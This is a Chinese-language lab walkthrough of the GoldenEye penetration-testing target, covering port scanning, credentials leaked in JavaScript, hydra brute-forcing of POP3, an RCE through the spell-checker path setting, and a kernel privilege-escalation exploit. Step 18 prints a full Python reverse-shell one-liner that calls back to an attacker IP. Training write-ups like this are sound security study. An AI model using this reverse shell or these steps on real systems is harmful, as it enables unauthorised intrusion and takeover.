GoldenEye 靶场渗透测试

admin 2022年4月2日08:36:30安全文章评论56 views1512字阅读5分2秒阅读模式

前言

GoldenEye 靶场渗透测试
GoldenEye 靶场渗透测试




欲善其事,必先利其器。学习好渗透最重要的是就是实践,我们可以通过在本地搭建靶场来作为我们的目标。通过对这些靶场的渗透练习,充分理解每个漏洞的原理。





GoldenEye 靶场渗透测试
GoldenEye 靶场渗透测试


渗透流程

1、在虚拟机上搭建好环境,设置网络为NAT模式后,如下图所示

GoldenEye 靶场渗透测试

2、先用arpscan扫一下C段寻找靶机的ip地址

GoldenEye 靶场渗透测试

3、找到靶场的IP地址 192.168.131.133用nmap扫描端口开放情况

GoldenEye 靶场渗透测试

4、发现开放了 25、80、55006、55007端口,接着去访问80端口,发现有一个提示目录/sev-home/是一个登录认证先放着

GoldenEye 靶场渗透测试

5、js代码处发现一处信息泄露,发现两个用户BorisNatalya以及一个经过html编码的密码InvincibleHack3r

GoldenEye 靶场渗透测试

6、通过js找到的账号和密码进行登陆,提示的登录页面发现两个用户都登陆失败。。。试了试小写居然登陆成功了

GoldenEye 靶场渗透测试

7、通过登陆成功后提示说开放了一个POP3服务在一个较大的端口上。想到前面端口扫描的55006和55007端口,用hydra爆破一下POP3服务器的密码,爆破出两个账号的密码

GoldenEye 靶场渗透测试

8、通过爆破出来的账号和密码登陆POP3服务器,在Natalya账号中发现线索,登陆显示内容有一个用户名和密码以及域名

GoldenEye 靶场渗透测试

9、访问域名我们需要在本地hosts文件添加dns解析,按照要求添加好dns解析后访问域名

GoldenEye 靶场渗透测试

10、登录前面给出的账号,在massages处看到新线索用户doak

GoldenEye 靶场渗透测试

11、接着用hydra爆破邮箱账号doak的密码

GoldenEye 靶场渗透测试

12、使用hydra爆破出的密码去登陆doak的邮箱,通过doak登陆显示内容发现了dr_doak用户的账户密码

GoldenEye 靶场渗透测试

13、通过dr_doak的账号和密码去网站登录,登陆成功

GoldenEye 靶场渗透测试

14、在网站中发现一个用户账号admin 以及一个文件

GoldenEye 靶场渗透测试

15、去看看这个图片,在图片的信息中发现了一个base64加密的东西

GoldenEye 靶场渗透测试

16、解密之后看着像是一串密码可能是admin的密码,去尝试登录,登陆成功

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

17、登陆成功之后,去网上搜索相关漏洞,发现有RCE

GoldenEye 靶场渗透测试

18、在Server中的system_path里的Path to aspell 添加一个python反弹shell的命令,然后添加spell engine如下图所示

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.131.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

GoldenEye 靶场渗透测试

19、最后在tags里面调用,如下图

GoldenEye 靶场渗透测试

20、反弹成功

GoldenEye 靶场渗透测试

21、但是因为是低权限,所以我们考虑提权,查看一下内核,发现是ubuntu 3.13版本的,在kali中搜索提权exp,使用37292.c这个

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

23、由于靶机上面没有gcc的命令,所以要把提权文件里把gcc改成cc,如下图所示,大约在143行处

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

24、然后把提权文件上传到靶机,修改文件权限(+x)后运行提权文件

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

25、最后进入root查看flag,发现没有东西,试试ls -a原来是隐藏文件,最后拿到flag

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

GoldenEye 靶场渗透测试

           团队介绍

银河护卫队super,是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍,定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。
GoldenEye 靶场渗透测试

点击关注银河护卫队super

原文始发于微信公众号(银河护卫队super):GoldenEye 靶场渗透测试

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月2日08:36:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  GoldenEye 靶场渗透测试 http://cn-sec.com/archives/763603.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: